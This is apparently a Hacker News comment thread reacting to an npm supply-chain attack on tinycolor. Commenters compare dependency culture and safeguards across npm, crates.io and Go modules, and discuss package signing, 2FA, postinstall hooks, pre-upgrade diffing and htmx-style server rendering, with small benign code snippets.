> Can NPM packages call internal functions for their dependencies instead of relying so heavily on bringing in so many external ones?
Yes, they can. They just don't do it.
> Doesn't bringing in so many dependencies lead to a lot of dead code and much larger codebases then necessary?
There aren't many unnecessary dependencies, because the number of direct dependencies on each package is reasonable (on the order of 10). And you don't get a lot of unnecessary code because the point of tiny libraries is to only import what you need.
Dead code is not the problem, instead the JS mentality evolved that way to minimize dead code. The problem is that dead code is actually not that much of an issue, but dependency management is.
there are indeed monster packages but you should ask yourself if you need them at all, because if you really do there is no way around performing nr1. you get the code, you own it. you propagate malware by negligence, you're finished as a sw engineer. simple as that.
personally i keep dependencies at a minimum and am very picky with them, partly because of nr1, but as a general principle. of course if people happily suck in entire trees without supervision just to print ansi colors on the terminal or, as in this case, use fancy aliases for colors then bad things are bound to happen. (tbf tinycolor has one single devDependency, shim-deno-test, which only requires typescript. that should be manageable)
i'll grant you that the js ecosystem is special, partly because the business has traditionally reinforced the notion of it being accessory, superficial and not "serious" development. well, that's just naivety, it is as critical a component as any other. ideally you should even have a security department vetting the dependencies for you.
Which mitigations specifically are in npm but not in crates.io?
As far as I know crates.io has everything that npm has, plus
- strictly immutable versions[1]
- fully automated and no human in the loop perpetual yanking
- no deletions ever
- a public and append only index
Go modules go even further and add automatic checksum verification per default and a cryptographic transparency log.
Contrast this with docker hub for example, where not even npm's basic properties hold.
So, it is more like
docker hub ⊂ npm ⊂ crates.io ⊂ Go modules
[1] Nowadays npm has this arguably too
> Go modules go even further and add automatic checksum verification per default
Cargo lockfiles contain checksums and Cargo has used these for automatic verification since time immemorial, well before Go implemented their current packaging system. In addition, Go doesn't enforce the use of go.sum files, it's just an optional recommendation: https://go.dev/wiki/Modules#should-i-commit-my-gosum-file-as... I'm not aware of any mechanism which would place Go's packaging system at the forefront of mitigation implementations as suggested here.
To clarify (a lot of sibling commenters misinterpreted this too so probably my fault - can't edit my comment now):
I'm not referring to mitigations in public repositories (which you're right, are varied, but that's a separate topic). I'm purely referring to internal mitigations in companies leveraging open-source dependencies in their software products.
These come in many forms, everything from developer education initiatives to hiring commercial SCA vendors, & many other things in between like custom CI automations. Ultimately, while many of these measures are done broadly for all ecosystems when targeting general dependency vulnerabilities (CVEs from accidental bugs), all of the supply-chain-attack motivated initiatives I've seen companies engage in are single-ecosystem. Which seems wasteful.
I mostly agree. But NPM is special, in that the exposure is so much higher. The hypothetical Python+htmx web app might have tens of dependencies (including transitive) whereas your typical JavaScript/React app will have thousands. All an attacker needs to do is find one of many packages like TinyColor or left-pad or whatever, and now loads of projects are compromised.
Stuff like Babel, React, Svelte, Axios, Redux, Jest… should be self-contained and not depend on anything other than being a peer dependency. They are core technological choices that happen early in the project and are hard or impossible to replace afterwards.
- I feel that you are unlikely to need Babel in 2025, most things it historically transpiled are Baseline Widely Available now (and most of the things it polyfilled weren't actually Babel's but brought in from other dependencies like core-js, which you probably don't need either in 2025). For the rest of the things it still transpiles (pretty much just JSX) there are cheaper/faster transpilers with fewer external dependencies and runtime dependencies (Typescript, esbuild). It should not be hard to replace Babel in your stack: if you've got a complex webpack solution (say from CRA reasons) consider esbuild or similar.
- Axios and Jest have "native" options now (fetch and node --test; see the sketch after this list). fetch is especially nice because it is the same API in the browser and in Node (and Deno and Bun).
- Redux is self-contained.
- React itself is sort of self-contained, it's the massive ecosystem that makes React the most appealing that starts to drive dependency bloat. I can't speak to Svelte.
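To make the fetch / node --test point concrete, here is a minimal sketch using only Node built-ins (assuming Node 18+, where both are available; the registry URL is just an illustrative target):

```js
// sum.test.js (run with: node --test)
// Uses only Node built-ins: node:test instead of Jest, global fetch instead of Axios.
import { test } from 'node:test';
import assert from 'node:assert/strict';

const sum = (a, b) => a + b;

test('sum adds numbers', () => {
  assert.equal(sum(2, 3), 5);
});

test('fetch is built in', async () => {
  // Illustrative request; any HTTP endpoint works the same way.
  const res = await fetch('https://registry.npmjs.org/@ctrl%2Ftinycolor');
  assert.equal(res.status, 200);
  const metadata = await res.json();
  assert.equal(metadata.name, '@ctrl/tinycolor');
});
```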
Yeah, I still don't understand a lot of the architecture choices behind the new compiler, including why the new compiler isn't mostly just a set of eslint suggestions with auto-fixes. I've seen the blog posts trying to explain it, but they don't seem to answer my questions. But then I also haven't done enough direct React work recently enough to have need of or actually tried to use the new compiler, so maybe I am just asking the wrong questions.
Yep, which is part of why it feels real good to delete Jest and switch to `node --test`. I realize for a lot of projects that is easier said than done because Jest isn't just the test harness but the assertions framework (`node:assert/strict` isn't terrible; Chai is still a good low-dependency option for fancier styles of assertions) and mocks/substitutes framework (I'm sure there are options there; I never liked Jest's style of mocks so I don't have a recommendation handy).
(ETA: Also, you may not need much for a mocks library because JS' Proxy meta-object isn't that hard to work with directly.)
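A rough sketch of that idea: a hand-rolled mock built on Proxy that records its calls, with no mocking library involved (all names here are illustrative):

```js
// createMock() returns an object whose every method exists, does nothing,
// and records the arguments it was called with under mock.calls.<name>.
function createMock() {
  const calls = {};
  return new Proxy({}, {
    get(_target, prop) {
      if (prop === 'calls') return calls;
      return (...args) => {
        (calls[prop] ??= []).push(args);
      };
    },
  });
}

// Usage: hand the mock to code that expects a real collaborator.
const mailer = createMock();
mailer.send('alice@example.com', 'hello');
console.log(mailer.calls.send); // [ [ 'alice@example.com', 'hello' ] ]
```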
> NPM is special, in that the exposure is so much higher.
NPM is special in the same way as Windows is special when it comes to malware: it's a more lucrative target.
However, the issue here is that - unlike Windows - targeting NPM alone does not incur significantly less overhead than targeting software registries more broadly. The overhead saved by focusing purely on NPM rather than covering a lot of popular languages isn't high, & imo it isn't a worthwhile trade-off.
Well, your typical Rust project has over 1000 dependencies, too. Zed has over 2000 in release mode.
Not saying this in defence of Rust or Cargo, but often times those dependencies are just different versions of the same thing. In a project at one of my previous companies, a colleague noticed we had LOADS of `regex` crate versions. Forgot the number but it was well over 100
That doesn't make sense. The most it could be is 3: regex 0.1.x, regex 0.2.y and regex 1.a.b. You can't have more because Cargo unifies on semver compatible versions and regex only has 3 semver incompatible releases. Plus, regex 1.0 has been out for eons. Pretty much everyone has moved off of 0.1 and 0.2.
The reason he went down this rabbit hole was because he was chronically running low on disk space, and his target dir was one of the largest contributors.
Not sure how he actually got the number; this was just a frustrated Slack message like 4 years ago
A sibling comment mentions we could have been using Cargo workspaces wrong... So, maybe?
He probably just needed to run `cargo clean` occasionally.
But you definitely aren't finding hundreds of versions of `regex` in the same dependency tree.
That seems like a failure in workspace management. The most duplicates I've seen was 3, with crates like url or uuid, even in projects with 1000+ distinct deps.
Your typical Rust project does not have over 1000 dependencies.
Zed is not a typical Rust project; it's a full fledged editor that includes a significant array of features and its own homegrown UI framework.
> Zed is not a typical Rust project; it's a full fledged editor
Funny that a text editor is being presented here as some kind of behemoth, not representative of typical software written in Rust. I guess typical would be the 1234th JSON serialization library.
One famous example is ripgrep (https://github.com/BurntSushi/ripgrep). Its Cargo.lock (which contains all direct and indirect dependencies) lists 65 dependencies (it has 66 entries, but one of them is for itself).
Also, that lock file includes development dependencies and dependencies for opt-in features like PCRE2. A normal `cargo build` will use quite a bit fewer than 65 dependencies.
I would actually say ripgrep is not especially typical here. I put a lot of energy into keeping my dependency tree slim. Many Rust applications have hundreds of dependencies.
We aren't quite at thousands of dependencies yet though.
> I would actually say ripgrep is not especially typical here. I put a lot of energy into keeping my dependency tree slim. Many Rust applications have hundreds of dependencies.
Thank you for your honesty, and like you and I said, you put a lot of energy into keeping the dependency tree slim. This is not as common as one would like to believe.
I agree it's not common. But neither are Rust applications with 1000+ dependencies. I don't think I've ever compiled a Rust project with over 1,000 dependencies.
Hundreds? Yes, absolutely. That's common.
Maybe I am just unlucky enough to always be running into Rust projects that pull in over 1000 dependencies. :D
In retrospect, I should have kept a list of these projects. I probably have not deleted these directories though, so I probably still could make a list of some of these projects.
Not quite. He is a better developer than most, and he happens to minimize dependencies, but in my experience that is not as common as you would like to believe. Do I really need to make a list of all the Rust projects I have compiled that pulled in over 1000 dependencies? If I need to do it to convince you, I will do so, as my time allows.
Most of the biggest repositories already cooperate through the OpenSSF[0]. Last time I was involved in it, there were representatives from npm, PyPI, Maven Central, Crates and RubyGems. There's also been funding through OpenSSF's Alpha-Omega program for a bunch of work across multiple ecosystems[1], including repos.
The Rust folks are in denial about this
Until you go get malware
Supply chain attacks happen at every layer where there is package management or a vector onto the machine or into the code.
What NPM should do if they really give a shit is start requiring 2FA to publish. Require a scan prior to publish. Sign the package with hard keys and signature. Verify all packages installed match signatures. Semver matching isn’t enough. CRC checks aren’t enough. This has to be baked into packages and package management.
> Until you go get malware
While technically true, I have yet to see Go projects importing thousands of dependencies. They may certainly exist, but are absolutely not the rule. JS projects, however...
We have to realize that, while supply chain attacks can happen everywhere, the best mitigations are development culture and a solid standard library - looking at you, Cargo.
I am a JS developer by trade and I think that this ecosystem is doomed. I absolutely avoid even installing node on my private machine.
Here's an example off the top of my head:
I think you are reading that wrong: go.sum isn't a list of dependencies, it's a list of checksums for modules that were, at some point, used by this module. All those different versions of the same module listed there aren't all dependencies; at most one of them is.
Assuming `go mod tidy` is run periodically, go.mod should contain all dependencies (which in this case seems to be just shy of 300, still a lot).
Half of the go.sum entries are generally multiple versions of the same package. 400 is still a lot, but a huge project like Gitea might need them, I guess.
```sh
> cat go.sum | awk '{print $1}' | sort | uniq | wc -l
431
> wc -l go.sum
1156 go.sum
```
> Sign the package with hard keys and signature.
That's really the core issue. Developer-signed packages (npm's current attack model is "Eve doing a man-in-the-middle attack between npm and you," which is not exactly the most common threat here) and a transparent key registry should be minimal kit for any package manager, even though all, or at least practically all, the ecosystems are bereft of that. Hardening API surfaces with additional MFA isn't enough; you have to divorce "API authentication" from "cryptographic authentication" so that compromising one doesn't affect the other.
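A minimal sketch of that separation, using Node's built-in Ed25519 support; this is not how npm works today, and the file name and flow are hypothetical:

```js
import { generateKeyPairSync, sign, verify } from 'node:crypto';
import { readFileSync } from 'node:fs';

// Publisher side: a signing key that is completely separate from any npm token,
// so phishing the registry login does not yield the ability to sign releases.
const { publicKey, privateKey } = generateKeyPairSync('ed25519');
const tarball = readFileSync('pkg-1.2.3.tgz');        // hypothetical artifact
const signature = sign(null, tarball, privateKey);    // detached signature

// Installer side: publicKey would come from a transparent key registry,
// not from the same API that served the tarball.
const ok = verify(null, tarball, publicKey, signature);
console.log(ok ? 'signature valid' : 'reject: not signed by the publisher key');
```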
How are users supposed to build and maintain a trust store?
In a hypothetical scenario where npm supports signed packages, let's say the user is in the middle of installing the latest signed left-pad. Suddenly, npm prints a warning that says the identity used to sign the package is not in the user's local database of trusted identities.
What exactly is the user supposed to do in response to this warning?
This is a solved problem. https://en.wikipedia.org/wiki/Web_of_trust
Imagine a hobbyist developer with a ~ $0 budget trying to publish their first package. How many thousands of km/miles are you expecting them to travel so they can get enough vouches for their package to be useful for even a single person?
Now imagine you're another developer who needs to install a specific NPM package published by someone overseas who has zero vouches by anyone in your web of trust. What exactly are you going to do?
In reality, forcing package publishers to sign packages would achieve absolutely nothing. 99.99% of package consumers would not even bother to begin building a web of trust, and would just blindly trust any signature.
The remaining 0.01% who actually try are either going to fail to gain any meaningful access to a WoT, or they're going to learn that most package publishers' identities are completely unreachable via any WoT whatsoever.
> What NPM should do if they really give a shit is start requiring 2FA to publish.
How does 2FA prevent malware? Anyone can get a phone number to receive a text or add an authenticator to their phone.
I would argue a subscription model for 1 EUR/month would be better. The money received could pay for certification of packages, and the credit card on file can leverage the security of the payments system.
How will multi-factor authentication prevent such a supply chain issue?
That is, if some attacker creates some dummy, trivial-but-convenient package and two years later half the package hub somehow depends on it, the attacker will just use their legit credentials to pwn everyone and their dog. This is not even about stealing credentials. It's a cultural issue of bare blind trust: a blank check without any expiry date.
That's an entirely different issue compared to what we're seeing here. If an attacker rug-pulls, of course there is nothing that can be done about that other than security scanning. Arguably, some kind of package security scanning is a core service that a lot of organisations would not think twice about paying npm for.
> If an attacker rug-pulls of course there is nothing that can be done about that other than security scanning.
As another subthread mentioned (https://news.ycombinator.com/item?id=45261303), there is something which can be done: auditing of new packages or versions, by a third party, before they're used. Even doing a simple diff between the previous version and the current version before running anything within the package would already help.
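A rough sketch of that pre-upgrade diff, using only npm and standard tools (package name and versions are placeholders):

```sh
# Download both tarballs without installing or running anything.
npm pack some-package@1.2.3 some-package@1.2.4
mkdir -p old new
tar -xzf some-package-1.2.3.tgz -C old
tar -xzf some-package-1.2.4.tgz -C new
# Tarball contents live under a package/ directory.
diff -ru old/package new/package | less
```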
If NPM really cared, they'd stop recommending people use their poorly designed version control system that relies on late-fetching third-party components required by the build step, and they'd advise people to pick a reliable and robust VCS like Git for tracking/storing/retrieving source code objects and stick to that. This will never happen.
NPM has also been sending out nag emails for the last 2+ years about 2FA. If anything, that constituted an assist in the attack on the Junon account that we saw a couple weeks ago.
NPM lock files seem to include hashes for integrity checking, so as long as you check the lock file into the VCS, what's the difference?
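For context, the integrity field in a package-lock.json is an SRI-style digest of the exact tarball bytes, which npm checks against the lockfile at install time; a minimal sketch of what it pins (the file name is illustrative):

```js
import { createHash } from 'node:crypto';
import { readFileSync } from 'node:fs';

// Compute the same kind of value that appears in the lockfile's "integrity"
// field: "sha512-" followed by the base64 digest of the tarball.
const tarball = readFileSync('some-package-1.2.3.tgz');
const integrity = 'sha512-' + createHash('sha512').update(tarball).digest('base64');
console.log(integrity);
```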
Wrong question; NPM isn't bedrock. The question to be answered if there is no difference is, "In that case, why bother with NPM?"
NPM does require 2FA to publish. I would love a workaround! Isn't it funny that even here on HN, misinformation is constantly being spread?
NPM does not require two-factor authentication. If two-factor authentication is enabled for your account and you wish to disable it, this explains how to do that if allowed by your organization:
<https://docs.npmjs.com/configuring-two-factor-authentication...>
It doesn't require 2FA in general, but it does for people with publish rights for popular packages, which covers most or all of the recent security incidents.
https://github.blog/changelog/2022-11-01-high-impact-package...
> The malware includes a self-propagation mechanism through the NpmModule.updatePackage function. This function queries the NPM registry API to fetch up to 20 packages owned by the maintainer, then force-publishes patches to these packages.
npm offers 2FA but it doesn't really advertise that it has a phishing-resistant 2FA (security keys, aka passkeys, aka WebAuthn) available and just happily lets you go ahead and use a very phishable OTP if you want. I place much of the blame for publishers getting phished on npm.
They are. Any language that depends heavily on package managers and lacks a standard lib is vulnerable to this.
At some point people need to realize and go back to writing vanilla js, which will be very hard.
The rust ecosystem is also the same. Too much dependence on packages.
An example of doing it right is golang.
The solution is not to go back to vanilla JS, it's for people to form a foundation and build a more complete utilities library for JS that doesn't have 1000 different dependencies, and can be trusted. Something like Boost for C++, or Apache Commons for Java.
> Something like Boost for C++, or Apache Commons for Java.
Honestly I wish Python worked this way too. The reason people use Requests so much is because urllib is so painful. Changes to a first-party standard library have to be very conservative, which ends up leaving stuff in place that nobody wants to use any more because they have higher standards now. It'd be better to keep the standard library to a minimum needed more or less just to make the REPL work, and have all of that be "builtin" the way that `sys` is; then have the rest available from the developers (including a default "full-fat" distribution), but in a few separately-obtainable pieces and independently versioned from the interpreter.
And possibly maintained by a third party like Boost, yeah. I don't know how important that is or isn't.
Python and Rust both have decent standard libraries, but it is just a matter of time before this happens in those ecosystems. There is nothing unique about this specific attack that means it could only happen in JavaScript.
>and go back to writing vanilla js
Lists of things that won't happen. Companies are filled with node_modules importers these days.
Even worse, now you have to check for security flaws in that JS that's been written by node_modules importers.
That, or someone could write a standard library for JS?
Some of us are fortunate to have never left vanilla JS.
Of course that limits my job search options, but I can't feel comfortable signing off on any project that includes more dependencies than I can count at a glance.
C#, Java, and so on.
Is the difference between the number of dev dependencies for e.g. Vue.js (a JavaScript library for marshalling JSON Ajax responses into UI) and htmx (a JavaScript library for marshalling HTML Ajax responses into UI) meaningful?
There is a difference, but it's not an order of magnitude and neither is a true island.
Granted, deciding not to use JS on the server is reasonable in the context of this article, but for the client htmx is as much a js lib with (dev) dependencies as any other.
https://github.com/bigskysoftware/htmx/blob/master/package.j...
Except that htmx's recommended usage is as a single <script> injected directly into your HTML page, not as an npm dependency. So unless you are an htmx contributor you are not going to be installing the dev dependencies.
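For reference, that single-script usage looks roughly like the sketch below; the URL, version, and hash are placeholders to be replaced with the ones published in the htmx docs:

```html
<!-- Pinning an exact version plus an SRI integrity attribute means the browser
     rejects the file if its bytes ever change. -->
<script src="https://unpkg.com/htmx.org@2.0.4/dist/htmx.min.js"
        integrity="sha384-REPLACE_WITH_PUBLISHED_HASH"
        crossorigin="anonymous"></script>
```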
That script still gets built somewhere using those deps
AFAICT, the only thing this attack relies on is the lack of scrutiny by developers when adding new dependencies.
Unless this lack of scrutiny is exclusive to the JavaScript ecosystem, this attack could just as well have happened in Rust or Golang.
I don't know Go, but Rust absolutely has the same problem, yes. So does Python. NPM is being discussed here, because it is the topic of the article, but the issue is the ease with which you can pull in unvetted dependencies.
Languages without package managers have a lot more friction to pull in dependencies. You usually rely on the operating system and its package-manager-humans to provide your dependencies; or on primitive OSes like Windows or macOS, you package the dependencies with your application, which involves integrating them into your build and distribution systems. Both of those involve a lot of manual, human effort, which reduces the total number of dependencies (attack points), and makes supply-chain issues like this more likely to be noticed.
The language package managers make it trivial to pull in dozens or hundreds of dependencies, straight from some random source code repository. Your dependencies can add their own dependencies, without you ever knowing. When you have dozens or hundreds of unvetted dependencies, it becomes trivial for an attacker to inject code they control into just one of those dependencies, and then it's game over for every project that includes that one dependency anywhere in their chain.
It's not impossible to do that in the OS-provided or self-managed dependency scenario, but it's much more difficult and will have a much narrower impact.
If you try installing npm itself on Debian, you would think you are downloading some desktop environment: so many little packages.
There is little point in you scrutinizing new dependencies.
Many who claim to fully analyze all dependencies are probably lying. I did not see anyone in the comments sharing their actual dependency count.
Even if you depend only on Jest - Meta's popular test runner - you add 300 packages.
Unless your setup is truly minimalistic, you probably have hundreds of dependencies already, which makes obsessing over some more rather pointless.
At least in the JS world there are more people (often also more inexperienced people) who will add a dependency willy-nilly. This is due to many people starting out with JS these days.
JavaScript does have some pretty insane dependency trees. Most other languages don’t have anywhere near that level of nestedness.
Don't they?
I just went to crates.io and picked a random newly updated crate, which happened to be pixelfix, which fixes transparent pixels in pngs.
It has six direct dependencies and hundreds of transitive dependencies, many of which appear to be small and highly specific, a la left-pad.
https://crates.io/crates/pixelfix/0.1.1/dependencies
Maybe this package isn't representative, but it feels pretty identical to the JS ecosystem.
It depends on `image` which in turn depends on a number of crates to handle different file types. If you disable all `image` features, it only has like 5 dependencies left.
And all those 5 remaining dependencies have lots of dependencies of their own. What's your point?
> What's your point?
Just defending Rust.
> 5 remaining dependencies have lots of dependencies of their own.
Mostly well-known crates like rayon, crossbeam, tracing, etc.
You cannot defend Rust if this is reality.
Any Rust project I have ever compiled pulled in over 1000 dependencies. Recently it was Zed with its >2000 dependencies.
I think it's justified for Zed. It does a lot of things.
Zed isn’t special, I doubt Sublime Text has thousands of dependencies. It’s a language/culture problem.
Edit: Ghostty is a good counter-example that is open source. https://github.com/ghostty-org/ghostty/tree/main/pkg
Zed is closer to IntelliJ or VSCode than to Sublime Text.
In the amount of bloat, yes.
It is also important to note that this is not specific to Zed. As someone else has mentioned, it is a cultural problem. I picked Zed as an example because it is what I compiled most recently, but it is definitely not limited to Zed. There are many Rust projects that pull in over 1000 dependencies and do much less than Zed.
It's not possible for a language to have an insane dependency tree. That's an attribute of a codebase.
Modern programming languages don't exist in a vacuum, they are tied to the existing codebase and libraries.
Sort of, but I don't really buy this argument. Someone could go and write the "missing JS stdlib" library that has no dependencies of its own. They could adopt release policies that reduce the risk of successful supply chain attacks. Other people could depend on it and not suffer deep dependency trees.
JS library authors in general could decide to write their own (or carefully copy-paste from libraries) utility functions for things rather than depend on a huge mess of packages. This isn't always a great path; obviously reinventing the wheel can come with its own problems.
So yes, I'd agree that the ecosystem encourages JS/TS developers to make use of the existing set of libraries and packages with deep dependency trees, but no one is holding a gun to anyone's head. There are other ways to do it.
Whatever you're trying to say, you aren't.
The C standard library is smaller than Node.js's (you won't have HTTP). What C does have is much more respectable libraries. If you add libcurl or FreeType to your project, they won't pull the whole jungle in with them.
What C doesn't have is an agreed-upon standard package manager. Which means that any dependency - including transitive ones! - requires some effort on behalf of the developer to add to the build. And that, in turn, puts pressure on library authors to avoid dependencies other than a few well-established libraries (like libpng or GLib).
You can add curl to a Rust project too.
Because it requires using async, and for most programs async is not worth the extra effort (plus a very heavy dependency in the form of Tokio).
It requires Tokio, and believe it or not there are actual cases for non-async rust. So you can't use it in that case.
It's bloated.
This makes little sense. Any popular language with a lax package management culture will have the exact same issue, this has nothing to do with JS itself. I'm actually doing JS quasi exclusively these days, but with a completely different tool chain, and feel totally unconcerned by any of these bi-weekly NPM scandals.
Rust is working on that. It's not far behind right now, leave it a couple of years.
That, and the ability to push an update without human interaction.
The blast radius is made far worse by npm having the concept of "postinstall", which gives any package the ability to run a command on the host system after it is installed.
This works for deps of deps as well, so anything in your node_modules has access to this hook.
It's a terrible idea and something that ought to be removed or replaced by something much safer.
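For anyone unfamiliar with the hook being discussed: any package that ends up in node_modules can declare a lifecycle script like the sketch below (names are illustrative; this mirrors the postinstall trigger described in the article), and npm runs it automatically during install.

```json
{
  "name": "innocuous-looking-package",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node bundle.js"
  }
}
```

Passing `--ignore-scripts` to npm install (or setting `ignore-scripts=true` in .npmrc) disables these hooks, at the cost of breaking packages that genuinely need an install step.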
I agree in principle, but child_process is a thing so I don't think it makes much difference. You are pwned either way if the package can ever execute code.
Simply avoiding Javascript won't cut it.
While npm is a huge and easy target, the general problem exists for all package repositories. Hopefully a supply chain attack mitigation strategy can be better than hoping attackers target package repositories you aren't using.
While there's a culture prevalent in Javascript development to ignore the costs of piling abstractions on top of abstractions, you don't have to buy into it. Probably the easiest thing to do is count transitive dependencies.
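A quick way to get that count, assuming a lockfileVersion 2 or 3 package-lock.json (the script name is made up):

```js
// count-deps.mjs: count every package npm resolved for this project,
// using the lockfile's "packages" map (the "" key is the root project itself).
import { readFileSync } from 'node:fs';

const lock = JSON.parse(readFileSync('package-lock.json', 'utf8'));
const installed = Object.keys(lock.packages ?? {}).filter((key) => key !== '');
console.log(`${installed.length} packages in the dependency graph`);
```

Something like `npm ls --all` should paint a similar picture.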
> Simply avoiding Javascript won't cut it.
But it will cut a large portion of it.
Javascript is badly over-used and over-depended on. So many websites just display text and images, but have extremely heavy javascript libraries because that's what people know and that is part of the default, and because it enables all the tracking that powers the modern web. There's no benefit to the user, and we'd be better off without these sites existing if there were really no other choice but to use javascript.
NPM does seem vastly overrepresented in these types of compromises, but I don't necessarily think that e.g. PyPI is much better in terms of security. So you could very well be correct that NPM is just a nicer, perhaps bigger, target.
If you can sneak malware into a JavaScript application that runs in millions of browsers, that's a lot more useful than getting some number of servers running a module as part of a script, whose environment is a bit unknown.
Javascript really could do with a standard library.
> So many websites just display text and images
Eh... This over-generalises a bit. That can be said of anything really, including native desktop applications.
Is that true? The things people use native desktop applications for nowadays tend to be exactly those which aren't just neat content displays. Spreadsheets, terminals, text-editors, CAD software, compilers, video games, photo-editing software. The only things I can think of that I use as just text/image displays are the file-explorer and image/media-viewer apps, of which there are really only a handful on any given OS.
You could argue that spreadsheets and terminals are just text with extra features! I'm joking though, but web apps usually are more than just text and images too.
Rendering template partials server-side and fetching/loading content updates with HTMX in the browser seems like the best of all worlds at this point.
Until you need to write JavaScript?
Then write it. Javascript itself isn't the problem, naive third-party dependencies are.
Which should be much less than what’s customary?
Until you have to.
The only way to win is not to play.
Let me quit my job real quick. The endgame is probably becoming a monk, no kidding.
I considered becoming a Zen monk, but then I gave up the desire.
> These attacks may just be the final push I needed to take server rendering (without js) more seriously
Have fun, seems like a misguided reason to do that though.
A. A package hosted somewhere using a language was compromised!
B. I am not going to program in the language anymore!
I don't see how B follows A.
Why is this inevitable? If you use only easily verifiable packages, you've lost nothing. The whole concept of npm automatically executing postinstall scripts was fixed when pnpm started asking me every time a new package wanted to do that.
> The HTMX folks convinced me that I can get REALLY far without any JavaScript
HTMX is JavaScript.
Unless you meant your own JavaScript.
When we say 'htmx allows us to avoid JavaScript', we mean two things: (1) we typically don't need to rely on the npm ecosystem, because we need very few (if any) third-party JavaScript libraries; and (2) htmx and HTML-first allow us to avoid writing a lot of custom JavaScript that we would have otherwise written.
HTMX is full of JavaScript. Server-side-rendering without JavaScript is just back to the stuff Perl and PHP give you.
I don't think the point is to avoid Javascript, but to avoid depending on a random number of third-parties.
> Server-side-rendering without JavaScript is just back to the stuff Perl and PHP give you.
As well as Ruby, Python, Go, etc.
HTMX does not have external dependencies, only dev dependencies, reducing the attack surface.
Do you count LiveView (Elixir) in that assessment?
This is going to become an issue for a lot of package managers, not just npm. Npm is clearly a very viable target right now, though. These attacks are going to get more and more sophisticated.
Took that route myself and I don't regret it. Now I can at least entirely avoid Node.js ecosystem.
Not for the frontend. esm modules work great nowadays with import maps.
> supply chain attacks
You all really need to stop using this term when it comes to OSS. Supply chain implies a relationship; none of these companies or developers have a relationship with the creators other than including their packages.
Call it something like "free code attacks" or "hobbyist code attacks."
“code I picked up off the side of the road”
“code I somehow took a dependency on when copying bits of someone’s package.json file”
“code which showed up in my lock file and I still don’t know how it got there”
All of which is true for far too many projects
I know CrowdStrike have a pretty bad reputation but calling them hobbyists is a bit rude.
I'm sure no offense was intended to hobbyists, but it was indeed rude
A supply chain can have hobbyists, there's no particular definition that says everyone involved must be a professional registered business.